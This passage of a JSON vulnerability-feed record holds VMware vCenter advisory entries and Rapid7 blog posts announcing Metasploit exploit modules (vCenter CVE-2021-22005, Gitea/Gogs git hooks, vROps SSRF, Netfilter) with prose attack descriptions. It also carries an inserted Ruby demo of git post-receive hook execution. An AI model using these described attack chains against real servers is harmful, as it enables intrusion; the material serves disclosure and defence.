unauthenticated API endpoint vulnerability in vCenter Server Content Library. 
VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.1. \n\n3e. vCenter Server improper permission local privilege escalation vulnerabilities (CVE-2021-22015) \n\nThe vCenter Server contains multiple local privilege escalation vulnerabilities due to improper permissions of files and directories. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. vCenter Server unauthenticated API information disclosure vulnerability (CVE-2021-22012) \n\nThe vCenter Server contains an information disclosure vulnerability due to an unauthenticated appliance management API. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.5. \n\n3g. vCenter Server file path traversal vulnerability (CVE-2021-22013) \n\nThe vCenter Server contains a file path traversal vulnerability leading to information disclosure in the appliance management API. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.5. \n\n3h. vCenter Server reflected XSS vulnerability (CVE-2021-22016) \n\nThe vCenter Server contains a reflected cross-site scripting vulnerability due to a lack of input sanitization. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.5. \n\n3i. vCenter Server rhttpproxy bypass vulnerability (CVE-2021-22017) \n\nRhttproxy as used in vCenter Server contains a vulnerability due to improper implementation of URI normalization. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.3. \n\n3j. 
vCenter Server authenticated code execution vulnerability (CVE-2021-22014) \n\nThe vCenter Server contains an authenticated code execution vulnerability in VAMI (Virtual Appliance Management Infrastructure). VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.2. \n\n3k. vCenter Server file deletion vulnerability (CVE-2021-22018) \n\nThe vCenter Server contains an arbitrary file deletion vulnerability in a VMware vSphere Life-cycle Manager plug-in. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 6.5. \n\n3l. vCenter Server XML parsing denial-of-service vulnerability (CVE-2021-21992) \n\nThe vCenter Server contains a denial-of-service vulnerability due to improper XML entity parsing. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 6.5. \n\n3m. vCenter Server local information disclosure vulnerability (CVE-2021-22007) \n\nThe vCenter Server contains a local information disclosure vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.5. \n\n3n. vCenter Server denial of service vulnerability (CVE-2021-22019) \n\nThe vCenter Server contains a denial-of-service vulnerability in VAPI (vCenter API) service. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3o. vCenter Server VAPI multiple denial of service vulnerabilities (CVE-2021-22009) \n\nThe vCenter Server contains multiple denial-of-service vulnerabilities in VAPI (vCenter API) service. VMware has evaluated the severity of these issues to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3p. 
vCenter Server VPXD denial of service vulnerability (CVE-2021-22010) \n\nThe vCenter Server contains a denial-of-service vulnerability in VPXD (Virtual Provisioning X Daemon) service. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3q. vCenter Server information disclosure vulnerability (CVE-2021-22008) \n\nThe vCenter Server contains an information disclosure vulnerability in VAPI (vCenter API) service. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3r. vCenter Server Analytics service denial-of-service Vulnerability (CVE-2021-22020) \n\nThe vCenter Server contains a denial-of-service vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.0. \n\n3s. vCenter Server SSRF vulnerability (CVE-2021-21993) \n\nThe vCenter Server contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in vCenter Server Content Library. 
VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 4.3.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-21T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address multiple security vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21991", "CVE-2021-21992", "CVE-2021-21993", "CVE-2021-22005", "CVE-2021-22006", "CVE-2021-22007", "CVE-2021-22008", "CVE-2021-22009", "CVE-2021-22010", "CVE-2021-22011", "CVE-2021-22012", "CVE-2021-22013", "CVE-2021-22014", "CVE-2021-22015", "CVE-2021-22016", "CVE-2021-22017", "CVE-2021-22018", "CVE-2021-22019", "CVE-2021-22020"], "modified": "2021-09-24T00:00:00", "id": "VMSA-2021-0020.1", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0020.1.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-10-08T16:58:28", "description": "## Telemetry is for gathering data, not executing commands as root, right?...\n\n\n\nThis week's highlight is a new exploit module by our own 
[wvu](<https://twitter.com/wvuuuuuuuuuuuuu>) for VMware vCenter Server CVE-2021-22005, a file upload vuln that arises from a flaw in vCenter\u2019s analytics/telemetry service, which is enabled by default. Attackers with network access to port 443 can upload a specially crafted file, after which commands can be executed as the root user without prior authentication. As usual, this latest vCenter Server vulnerability was exploited in the wild quickly after details were released. See Rapid7\u2019s full technical analysis in [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>).\n\n## Good ol' Netfilter\n\nThis week\u2019s release also includes a privilege escalation module for a Linux kernel vulnerability in Netfilter that lets you get a root shell through an out-of-bounds write. The vulnerability was discovered by [Andy Nguyen](<https://twitter.com/theflow0>) and has been present in the Linux kernel for the past 15 years. The module currently supports 18 versions of the Ubuntu kernel ranging between 5.8.0-23 to 5.8.0-53 thanks to [bcoles](<https://github.com/bcoles>), and there are plans to add further support for kernel versions 4.x in the future, once an ROP chain for said version is created.\n\n## New module content (3)\n\n * [VMware vCenter Server Analytics (CEIP) Service File Upload](<https://github.com/rapid7/metasploit-framework/pull/15747>) by wvu, Derek Abdine, George Noseevich, Sergey Gerasimov, and VMware, which exploits [CVE-2021-22005](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005?referrer=blog>) \\- This adds an exploit for CVE-2021-22005 which is an unauthenticated RCE within the VMWare vCenter appliance.\n * [Netfilter x_tables Heap OOB Write Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15698>) by Andy Nguyen (theflow0), Szymon Janusz and bcoles, which exploits [CVE-2021-22555](<https://attackerkb.com/topics/J8IVZzRUyG/cve-2021-22555?referrer=blog>) \\- This PR 
adds a module for CVE-2021-22555, a 15-year-old heap out-of-bounds write vulnerability in Linux Netfilter.\n * [Diagnostic State](<https://github.com/rapid7/metasploit-framework/pull/15739>) by Jay Turla - Adds a new `post/hardware/automotive/diagnostic_state` module which will keep the vehicle in a diagnostic state.\n\n## Enhancements and features\n\n * [#15735](<https://github.com/rapid7/metasploit-framework/pull/15735>) from [jaydesl](<https://github.com/jaydesl>) \\- Fixes a Rails 6 deprecation warning when a user ran `db_disconnect` in msfconsole\n * [#15740](<https://github.com/rapid7/metasploit-framework/pull/15740>) from [h00die](<https://github.com/h00die>) \\- Several improvements have been made to the Ghostcat module to align it with recent standards changes that the team has made and to ensure its documentation is more descriptive.\n * [#15750](<https://github.com/rapid7/metasploit-framework/pull/15750>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Improves Ruby 3.0.2 support on Windows\n\n## Bugs fixed\n\n * [#15729](<https://github.com/rapid7/metasploit-framework/pull/15729>) from [ErikWynter](<https://github.com/ErikWynter>) \\- This fixes a bug in the PrintNightmare check method where if an RPC function returns a value that can't be mapped to a Win32 error code, the module would crash.\n * [#15730](<https://github.com/rapid7/metasploit-framework/pull/15730>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The `check` method for the Gitea Git hooks RCE module has been updated to correctly handle older versions of Gitea and report their exploitability as unknown vs reporting the target as not running Gitea.\n * [#15737](<https://github.com/rapid7/metasploit-framework/pull/15737>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- A bug has been fixed whereby `action` wasn't correctly being set when using the action name as a command. 
`action` should now hold the right value when using the action name as a command.\n * [#15745](<https://github.com/rapid7/metasploit-framework/pull/15745>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- A bug has been fixed in `tools/dev/msftidy.rb` whereby if the `Notes` section was placed before the `References` section, then `msftidy` would end up not checking the `References` section and would therefore state the module didn't have a CVE reference, even when it did.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.8...6.1.9](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-30T11%3A56%3A48-05%3A00..2021-10-06T17%3A12%3A52-05%3A00%22>)\n * [Full diff 6.1.8...6.1.9](<https://github.com/rapid7/metasploit-framework/compare/6.1.8...6.1.9>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T16:57:33", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005", "CVE-2021-22555"], "modified": "2021-10-08T16:57:33", "id": "RAPID7BLOG:C1B4AB12CDDD030CDAB31AA2F9E27438", "href": "https://blog.rapid7.com/2021/10/08/metasploit-wrap-up-133/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-04T19:05:10", "description": "\n\n_See the Updates section at the end of this post for new information as it comes to light, including reports of exploitation._\n\n## Description\n\nOn Tuesday, September 21, 2021, VMware published [security advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>), which includes details on CVE-2021-22005, a 
critical file upload vulnerability (CVSSv3 9.8) in vCenter Server that allows remote code execution (RCE) on the appliance. Successful exploitation of this vulnerability is achieved simply by uploading a specially crafted file via port 443 \u201cregardless of the configuration settings of vCenter Server.\u201d\n\nVMware has published an [FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq#section1>) outlining the details of this vulnerability and makes it clear that this should be patched \u201cimmediately.\u201d A workaround is also being provided by VMware \u2014 however, its use is not being recommended and should only be used as a temporary solution.\n\nYou can find Rapid7's vulnerability analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>) which contains a root cause analysis and full RCE information.\n\n## Affected products\n\n * vCenter Server versions 6.7 and 7.0\n * Cloud Foundation (vCenter Server) 3.x, 4.x\n\n## Guidance\n\nWe echo VMware\u2019s advice that impacted servers should be patched right away. While there are currently no reports of exploitation, we expect this to quickly change within days \u2014 just as previous critical vCenter vulnerabilities did ([CVE-2021-21985](<https://www.rapid7.com/blog/post/2021/05/26/cve-2021-21985-vcenter-server-what-you-need-to-know/>), [CVE-2021-21972](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>)). 
Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet.\n\nWe will update this post as more information becomes available, such as information on exploitation.\n\n## Rapid7 customers\n\nA vulnerability check for CVE-2021-22005 is under development and will be available to InsightVM and Nexpose customers in an upcoming content release pending the QA process.\n\nIn the meantime, InsightVM customers can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to find assets that have vCenter Server installed by creating the following query: `software.description` `contains` `vCenter Server`. Rapid7 Nexpose customers can create a [Dynamic Asset Group](<https://docs.rapid7.com/nexpose/performing-filtered-asset-searches>) based on a filtered asset search for `Software name` `contains` `vCenter Server`.\n\n## Updates\n\n**[September 22, 2021]** \nAn InsightVM and Nexpose vulnerability check for CVE-2021-22005 is scheduled to be released on the afternoon (EST) of September 22, 2021.\n\nRapid7 Labs estimates there are over 2,700 vulnerable vCenter servers exposed to the public internet. This represents only a fraction of vulnerable servers, however, as attackers with existing network ingress will be tempted to utilize that access to take advantage of this vulnerability. 
\n\n**[September 23, 2021]** \nCVE-2021-22005 authenticated checks for InsightVM and Nexpose are available in content update 3594982882, released on September 23, 2021.\n\n**[September 24, 2021]** \nCVE-2021-22005 is now being [exploited](<https://twitter.com/bad_packets/status/1441465508348317702>) in the wild.\n\n**[September 29, 2021]** \nUpdated description to include a link to the Rapid7 analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T19:55:35", "type": "rapid7blog", "title": "Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005"], "modified": "2021-09-21T19:55:35", "id": "RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "href": "https://blog.rapid7.com/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/", "cvss": {"score": 10.0, 
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-09T20:50:41", "description": "## Spilling the (Gi)tea\n\n\n\nWe have two modules coming in from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) targeting [CVE-2020-14144](<https://attackerkb.com/topics/ZTlYBaSclN/cve-2020-14144?referrer=blog>) for both the Gitea and Gogs self-hosted Git services. \nBoth modules are similar: they take advantage of a user\u2019s ability to create Git hooks by authenticating with the web interface, creating a dummy repository with the aforementioned git hook, and triggering it\u2014which will execute the payload!\n\n## Apache OFBiz Deserialization\n\nHere we have [wvu-r7](<https://github.com/wvu-r7>) and [zeroSteiner](<https://github.com/zeroSteiner>) joining forces to bring us a module targeting [CVE-2021-26295](<https://attackerkb.com/topics/gPRJEi19sG/cve-2021-26295?referrer=blog>). \nThis module takes advantage of an unauthenticated SOAP interface in the Apache OFBiz application that accepts and deserializes an arbitrary Java object which leads to remote code execution.\n\n## New Modules (4)\n\n * [Apache OFBiz SOAP Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14971>) by wvu, Spencer McIntyre, and yumusb: This adds an exploit module that targets Apache OFBiz versions prior to `v17.12.06`, which are vulnerable to a Java deserialization vulnerability. By sending a serialized payload to the `webtools/control/SOAPService` endpoint, unauthenticated remote code execution as the user running the Apache OFBiz service can be achieved.\n * [Gitea and Gogs Git Hooks Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14978>) by Christophe De La Fuente and Podalirius: This adds two modules, `exploit/multi/http/gitea_git_hooks_rce` and `exploit/multi/http/gogs_git_hooks_rce` that both leverage a git hooks setting to achieve authenticated remote code execution against vulnerable versions of Gitea and Gogs respectively. 
With valid credentials and the permission to create git hooks, both modules create a repo and upload a payload as a `post-receive` hook. Upon creating an additional file in the repo, the `post-receive` hook will be triggered, which will grant code execution as the user running the software.\n * [Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server](<https://github.com/rapid7/metasploit-framework/pull/14965>) by Vladimir Ivanov and Yvan Genuer: This adds a new post module that leverages an insecure password storage vulnerability identified as CVE-2019-0307 to retrieve credentials such as SLD user connection and Solman user communication. This also improves the `cve_2020_6207_solman_rce` auxiliary module by adding a new SECTORE action performing the same attack remotely by leveraging an authentication bypass identified as CVE-2020-6207.\n\n## Enhancements and features\n\n * [#14813](<https://github.com/rapid7/metasploit-framework/pull/14813>) from [bcoles](<https://github.com/bcoles>): This updates the `exploit/windows/http/dupscts_bof` module by including coverage for six more vulnerable versions of the Dup Scout Enterprise software, leveraging auto-targeting, and adding module traits and references.\n\n## Bugs Fixed\n\n * [#14975](<https://github.com/rapid7/metasploit-framework/pull/14975>) from [timwr](<https://github.com/timwr>): This fixes an issue in the `cve_2020_1054_drawiconex_lpe` module, which was throwing an exception when the target was not vulnerable.\n * [#14987](<https://github.com/rapid7/metasploit-framework/pull/14987>) from [dwelch-r7](<https://github.com/dwelch-r7>): Fixes an issue where users were only getting three attempts at brute forcing via the `mysql_login` module.\n * [#14992](<https://github.com/rapid7/metasploit-framework/pull/14992>) from [jmartin-r7](<https://github.com/jmartin-r7>): Updates the auto_target_host logic to additionally handle `rhost` being nil\n * 
[#14998](<https://github.com/rapid7/metasploit-framework/pull/14998>) from [wvu-r7](<https://github.com/wvu-r7>): Changes CVE references from CVE Details to NVD\n * [#14873](<https://github.com/rapid7/metasploit-framework/pull/14873>) from [dwelch-r7](<https://github.com/dwelch-r7>): Fixes an issue where individual modules that failed to load would stop the remaining modules from loading successfully when running the `show payloads` command or `msfvenom -l payloads`\n * [#14988](<https://github.com/rapid7/metasploit-framework/pull/14988>) from [h00die](<https://github.com/h00die>): A fix to validation of custom wordlist values restores auxiliary cracker module functions when no custom wordlist file is supplied.\n * [#14991](<https://github.com/rapid7/metasploit-framework/pull/14991>) from [jra89](<https://github.com/jra89>): Fixes a regression that caused the NTP protocol fuzzer modules to crash when being used\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.38...6.0.39](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-01T08%3A47%3A57-05%3A00..2021-04-07T13%3A51%3A53-05%3A00%22>)\n * [Full diff 6.0.38...6.0.39](<https://github.com/rapid7/metasploit-framework/compare/6.0.38...6.0.39>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
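Before the download links, an added example of the primitive the Gitea and Gogs modules above rely on. This is a local demonstration written for this page, not the modules' code: a server-side `post-receive` hook is an ordinary script that git executes, as the account owning the repository, on every push, which is exactly why both projects gate hook editing behind a permission and why the modules need credentials that carry it. It assumes a `git` binary on `PATH` and runs entirely inside a temporary directory; the hook here only records what it was handed and which uid it ran as.

```ruby
require 'tmpdir'

# Added example for this page, not the Gitea/Gogs modules' code: a local
# demonstration of the primitive they rely on. A server-side post-receive
# hook is an ordinary script that git executes, as the repository's owner,
# every time someone pushes. Assumes the git binary is on PATH; everything
# happens inside a temporary directory.

# Run git with a fixed identity so commits work without global config;
# raise on failure instead of silently continuing.
def git(*args, dir: nil)
  cmd = ['git', '-c', 'user.name=demo', '-c', 'user.email=demo@example.invalid',
         '-c', 'init.defaultBranch=main']
  cmd += ['-C', dir] if dir
  out = IO.popen(cmd + args, err: [:child, :out], &:read)
  raise "git #{args.first} failed:\n#{out}" unless $?.success?

  out
end

# Create a bare "server" repo with a post-receive hook, push to it from a
# clone, and return what the hook recorded (nil if it never ran).
def demo_post_receive_hook
  Dir.mktmpdir('hookdemo') do |root|
    bare   = File.join(root, 'server.git')
    work   = File.join(root, 'work')
    marker = File.join(root, 'hook-ran')

    git('init', '--bare', '-q', bare)

    # The hook body is the attacker-controlled part in the Gitea/Gogs case.
    # Here it only records the pushed ref and the uid it executed under.
    hook = File.join(bare, 'hooks', 'post-receive')
    File.write(hook, <<~SH)
      #!/bin/sh
      # post-receive reads "<old-sha> <new-sha> <refname>" lines on stdin
      while read old new ref; do
        echo "$ref uid=$(id -u)" >> '#{marker}'
      done
    SH
    File.chmod(0o755, hook)

    # Any push triggers it: clone, add a file, commit, push.
    git('clone', '-q', bare, work)
    File.write(File.join(work, 'README'), "any change triggers the hook\n")
    git('add', 'README', dir: work)
    git('commit', '-q', '-m', 'trigger hook', dir: work)
    git('push', '-q', 'origin', 'HEAD', dir: work)

    File.exist?(marker) ? File.read(marker).strip : nil
  end
end

puts demo_post_receive_hook if $PROGRAM_NAME == __FILE__
```

For defenders of self-hosted Git services the takeaway is the same as the modules': the git-hooks permission is equivalent to shell access as the service account, so grant it as you would grant shell, and treat unexpected changes to `hooks/` (or the service's own hook storage) in server-side repositories as a detection signal.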
To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-04-09T19:17:46", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0307", "CVE-2020-14144", "CVE-2020-6207", "CVE-2021-26295"], "modified": "2021-04-09T19:17:46", "id": "RAPID7BLOG:5469B2F04F34A9BFD78A364ECC4F941F", "href": "https://blog.rapid7.com/2021/04/09/metasploit-wrap-up-106/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T18:51:30", "description": "## Operations shell\n\n\n\nOperations and management software make popular targets due to their users typically having elevated privileges across a network. Our own [wvu](<https://github.com/wvu-r7>) contributed the [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) exploit module for the vulnerabilities discovered by security researcher Egor Dimitrenko. The `exploit/linux/http/vmware_vrops_mgr_ssrf_rce` module achieves remote code execution (RCE) as the `admin` Unix user by chaining the two vulnerabilities. First, [CVE-2021-21975](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975?referrer=blog#rapid7-analysis>) pre-authentication server-side request forgery (SSRF) vulnerability is exploited in the `/casa/nodes/thumbprints` endpoint to obtain the admin credentials. Then, the credentials are used to authenticate to the vRealize Operations Manager API and exploit [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) via the `/casa/private/config/slice/ha/certificate` endpoint. This allows the module to write and execute an arbitrary file, a JSP payload in this case. 
The module should work against the following vulnerable versions:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n\n## Data rules everything around me\n\nMany dynamic websites and business applications have associated databases, so databases are commonplace on networks. Odds are you frequently encounter more than one database on an engagement. The release this week includes two new database-related modules!\n\nThe first is an [Apache Druid RCE](<https://github.com/rapid7/metasploit-framework/pull/14977>) exploit module for a vulnerability in versions 0.20.0 and older. The vulnerability, [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>), was discovered by Litch1, and [je5442804](<https://github.com/je5442804>) contributed the module. The second is a gather module named [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>), contributed by [Geoff Rainville (noncenz)](<https://github.com/noncenz>), which enables easy looting of any key-value stores you discover.\n\n## New Module Content (5)\n\n * [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) by Geoff Rainville noncenz - Adds a module to retrieve all data from a Redis instance (version 2.8.0 and above).\n * [Apache Druid 0.20.0 Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14977>) by Litch1, Security Team of Alibaba Cloud and je5442804, which exploits [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) \\- This adds an exploit module that targets Apache Druid versions prior to `0.20.1`. An authenticated user can send a single request that both enables the execution of user-provided JavaScript code and executes the code on the server with the privileges of the user running the Apache Druid process. 
By default, Apache Druid does not require authentication.\n * [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) by wvu and Egor Dimitrenko, which exploits [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) \\- This adds a module that exploits both a pre-auth SSRF and a post-auth file write via directory traversal to get code execution as the `admin` user on vulnerable VMware vRealize Operations Manager installs.\n * [Micro Focus Operations Bridge Reporter shrboadmin default password](<https://github.com/rapid7/metasploit-framework/pull/15086>) by Pedro Ribeiro, which exploits ZDI-20-1215 - This adds an exploit for [CVE-2020-11857](<https://attackerkb.com/topics/0rBqrv2UNX/cve-2020-11857?referrer=blog>), a hardcoded SSH password for the `shrboadmin` account in Micro Focus Operations Bridge Reporter instances.\n * [KOFFEE - Kia OFFensivE Exploit](<https://github.com/rapid7/metasploit-framework/pull/15021>) by Gianpiero Costantino and Ilaria Matteucci, which exploits [CVE-2020-8539](<https://attackerkb.com/topics/zXxJ29z090/cve-2020-8539?referrer=blog>) \\- This adds a post module that leverages the CVE-2020-8539 vulnerability on certain Kia Motors head units. 
This vulnerability is also known as KOFFEE.\n\n## Enhancements and features\n\n * [#11257](<https://github.com/rapid7/metasploit-framework/pull/11257>) from [sempervictus](<https://github.com/sempervictus>) \\- This PR adds the ability to wrap some powershell used for exploitation purposes with RC4 for obfuscation.\n * [#15014](<https://github.com/rapid7/metasploit-framework/pull/15014>) from [ctravis-r7](<https://github.com/ctravis-r7>) \\- Adds the ability to specify an individual private key as a string parameter into the `auxiliary/scanner/ssh/ssh_login_pubkey` module.\n * [#15110](<https://github.com/rapid7/metasploit-framework/pull/15110>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds the necessary functionality to the Java Meterpreter to resolve hostnames over DNS, closing a feature gap that had been present with other Meterpreters.\n\n## Bugs Fixed\n\n * [#14953](<https://github.com/rapid7/metasploit-framework/pull/14953>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fix the python 3.6 string formatting syntax in modules/auxiliary/scanner/http/rdp_web_login\n * [#15050](<https://github.com/rapid7/metasploit-framework/pull/15050>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Fixes a crash in Metasploit's console when the user tried to tab complete values such as file paths that were missing their final ending quote\n * [#15081](<https://github.com/rapid7/metasploit-framework/pull/15081>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Updates the Microsoft SQL Server interesting data finder module to correctly handle the scenario where no interesting data is found. 
Previously this would result in a module crash.\n * [#15094](<https://github.com/rapid7/metasploit-framework/pull/15094>) from [timwr](<https://github.com/timwr>) \\- This fixes a bug in how certain Meterpreters executed commands issued through `sessions -c`: some used a subshell while others did not.\n * [#15114](<https://github.com/rapid7/metasploit-framework/pull/15114>) from [smashery](<https://github.com/smashery>) \\- Updates the `auxiliary/scanner/redis/file_upload` module to correctly handle Redis instances that require authenticated access.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-22T13%3A32%3A25%2B10%3A00..2021-04-29T10%3A54%3A48-05%3A00%22>)\n * [Full diff 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/compare/6.0.41...6.0.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework 